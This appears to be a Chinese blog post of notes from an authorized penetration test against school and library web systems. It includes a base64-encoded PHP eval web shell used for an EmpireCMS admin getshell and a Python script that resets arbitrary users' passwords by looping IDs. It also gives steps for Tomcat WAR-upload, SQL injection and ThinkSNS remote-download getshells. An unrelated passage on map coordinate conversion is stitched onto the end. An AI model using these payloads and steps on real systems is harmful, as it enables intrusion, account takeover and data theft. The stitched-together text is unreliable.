授权渗透测试小记

一、某次授权渗透测试部分小记

本文已得到授权
如发现存在问题发送邮件到:UzJuer@163.com删除文章

1、帝国CMS 后台GETSHELL

图书馆的一个系统,为开源CMS修改的,然后通过版本探测与其他的信息收集,发现那个版本好像有一个getshell,不过是后台的,尝试一下,账号admin密码123456发现对了之后GetShell了

1

2

<script language="php">echobase64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjb WQnXSk7Pz4=");</script>

//这个是当时的payload

image-20210415200000737

image-20210415200305014

点击提交后访问http://xxxxx:port/e/admin/R3inSecurity_Team.php

然后使用菜刀连接就可以了

image-20210415200511803

不过需要注意的是,这里执行cmd命令会发现其实不是administrator,需要提权,因为当时除了这里其他地方已经获取到了administrator权限, 所以这个shell就没有提权

image-20210415200539992


2、某营销系统综合实训室逻辑漏洞

以下是我当时挖到漏洞后写的Poc

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

1.# __author__ 'R3inS3curity.UzJu'

2.# Creat time 2020/7/17 20:14 

3.import requests 

4.import re 

5.from bs4 import BeautifulSoup 

6. 

7.def Hacked_Testing(): 

8.    for a in range(1,100): 

9.        r = 'http://xxx:port/updaXte.dXo?methXod=saXve' 

10.        cookie1s = {'JSESSIONID':'DCBDA30F80F1DEA2X1123C8080FBE'

11.                   'submenuheader':'-1c'

12.        datas =

13.            'id':a, 

14.            'password':'123456789'

15.            'repassword':'123456789'

16.            'stuNo':'200107'

17.            'realName':'%E4%B1231%A3'

18.            'sex':'1'

19.            'schollTime': '2019-03-08'

20.            'tel': '%3Cscr23rt123t%3E'

21.            'address': '%3Cscript%3E1alert%281%23script%3E'

22.            'birthPlace': '%3Cscrip123Fscript%3E'

23.            'idNumber': '%3Cscript%3Eale123C%2Fscript%3E'

24.            'head_img': '%2Fuploadfiles1%123lt_head.gif'

25.            'x=': '50'

26.            'y': '6' 

27.       

28.        result = requests.post(url=r, cookies=cookie1s, data=datas) 

29.        soup = BeautifulSoup(result.text, features="html.parser"

30.        print('[+]Current ID is:{},UserName is:{}'.format(a, soup.td.text)) 

31.Hacked_Testing()

当时的漏洞截图

这个ID就是用户的ID,修改这个就可以重置任何用户的密码^ ^ 然后写脚本跑

尝试将修改的密码,进行登录,可以登录成功。

3、C-xxxx打印服务系统未授权访问

只要一直点直接打印,打印机就会一直出纸,也可以DIY打印内容,只需要替换框中的内容即可,后来沟通中反馈说打印机除了非常多的纸,部分员工还以为打印机坏了

4、tomcat弱口令GETSHELL

这个漏洞主要就是tomcat-user.xml的配置问题导致的,然后进到manger后上传shell的war包就可以了

这个账号admin 密码为空,然后上传war包就可以getshell了

打包好之后上传就可以啦

5、某卓越营销实践系统SQL注入getshell

这个漏洞没啥好说的,上去sqlmap一把嗦就完事了(其实这里还有一个存储型XSS)

image-20210718145257065

image-20210718145317033

image-20210718145329516

image-20210718145343862

然后远程链接服务器就可以了

这个服务器改端口了,本来是3389远程连接的,改成了3300,接下来就简单说一下,怎么找到3300这个端口的

Cmd输入tasklist /svc然后找到TermService找到PID2416

然后使用netstat -aon|findstr “2416”找到对应的PID就能找到远程端口


6、ThinkSNS管理员弱口令后台GetShell

弱口令登录,后台getshell

漏洞复现地址:http://xxx:port/index.php?app=admin&mod=Upgrade&act=step1&upurl=http://xxx:port/test/UzJu.zip

由于配置问题,访问/data/upgrade就可以看到目录下的文件,data目录也是如此

将数据包的act改成setp2和upurl改成filename=UzJu.zip

然后去访问这个Php

image-20210415212408508

然后正常获取权限就行,以下是漏洞代码的位置

漏洞代码发生在路径/apps/admin/lib/Action/UpgradeAction.class.php文件。

46行处,升级时调用check函数升级通过C('UPURL').'?v='.C('VERSION')获取升级链接

在169行,直接再次调用且upurl可控,覆盖之前的&upurl远程升级下载包含.php的UzJu.zip压缩包先下载再校验,存在逻辑问题,直接构造url payload下载。此为漏洞的引发起始点,再往下看在226行处step2,Step2解压也存在问题未进行校验文件就进行解压到网站根目录

image-20210416080517746

7、文件共享信息泄露

全是DB与数据

8、某卓越市场营销模拟平台垂直越权

image-20210718145726756

image-20210718145743149

image-20210718145754645

登录不同的账号,就会有不同的路径,然后尝试改一改路径,发现可以越权,:)

image-20210718145804002

image-20210718145828329

两张图不难发现,我通过修改不同的路径,然后越权到了不同的权限,学生--->老师

image-20210718145857505

在IT领域,尤其是地理信息系统(GIS)中,坐标转换是一项关键技术。本文将深入探讨百度坐标系、火星坐标系和WGS84坐标系之间的相互转换,并介绍如何使用相关工具进行批量转换。 首先,我们需要了解这三种坐标系的基本概念。WGS84坐标系,即“World Geodetic System 1984”,是一种全球通用的地球坐标系统,广泛应用于GPS定位和地图服务。它以地球椭球模型为基础,以地球质心为原点,是国际航空和航海的主要参考坐标系。百度坐标系(BD-09)是百度地图使用的坐标系。为了保护隐私和安全,百度对WGS84坐标进行了偏移处理,导致其与WGS84坐标存在差异。火星坐标系(GCJ-02)是中国国家测绘局采用的坐标系,同样对WGS84坐标进行了加密处理,以防止未经授权的精确位置获取。 坐标转换的目的是确保不同坐标系下的地理位置数据能够准确对应。在GIS应用中,通常通过特定的算法实现转换,如双线性内插法或四参数转换法。一些“坐标转换小工具”可以批量转换百度坐标、火星坐标与WGS84坐标。这些工具可能包含样本文件(如org_xy_格式参考.csv),用于提供原始坐标数据,其中包含需要转换的经纬度信息。此外,工具通常会附带使用指南(如重要说明用前必读.txt和readme.txt),说明输入数据格式、转换步骤及可能的精度问题等。x86和x64目录则可能包含适用于32位和64位操作系统的软件或库文件。 在使用这些工具时,用户需要注意以下几点:确保输入的坐标数据准确无误,包括经纬度顺序和浮点数精度;按照工具要求正确组织数据,遵循读写规则;注意转换精度,不同的转换方法可能会产生微小误差;在批量转换时,检查每个坐标是否成功转换,避免个别错误数据影响整体结果。 坐标转换是GIS领域的基础操作,对于地图服务、导航系统和地理数据分析等至关重要。理解不同坐标系的特点和转换方法,有助于我们更好地处
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值